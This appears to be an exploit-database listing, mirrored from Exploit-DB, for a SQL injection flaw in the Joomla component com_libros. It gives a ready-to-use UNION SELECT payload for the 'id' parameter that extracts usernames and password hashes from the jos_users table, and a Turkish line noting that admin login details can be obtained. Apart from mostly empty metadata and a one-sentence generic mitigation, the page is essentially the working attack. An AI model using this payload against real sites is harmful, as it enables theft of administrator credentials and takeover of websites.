Joomla Component com_libros SQL Injection Vulnerability

vendor:

com_libros

by:

FL0RiX

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: com_libros

Affected Version From: Unknown

Affected Version To: Unknown

Patch Exists: Unknown

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

Unknown

Joomla Component com_libros SQL Injection Vulnerability

Admin login bilgileri alinabilir. http://server/index.php?option=com_libros&task=detail&Itemid=27&id=[EXPLOIT] Exploit:null+union+select+1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49+from+jos_users--

Mitigation:

Input validation and sanitization should be done to prevent SQL injection attacks.

Source

Exploit-DB raw data:

########################################################################
#        Joomla Component com_libros SQL Injection Vulnerability
########################################################################
# Author   :FL0RiX
#
# Name     : com_libros
#
# Bug Type   : SQL Injection
#
# Infection    : Admin login bilgileri alinabilir.
#
# Demo Vuln :
#
# http://server/index.php?option=com_libros&task=detail&Itemid=27&id=[EXPLOIT]
#Exploit:null+union+select+1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49+from+jos_users--
########################################################################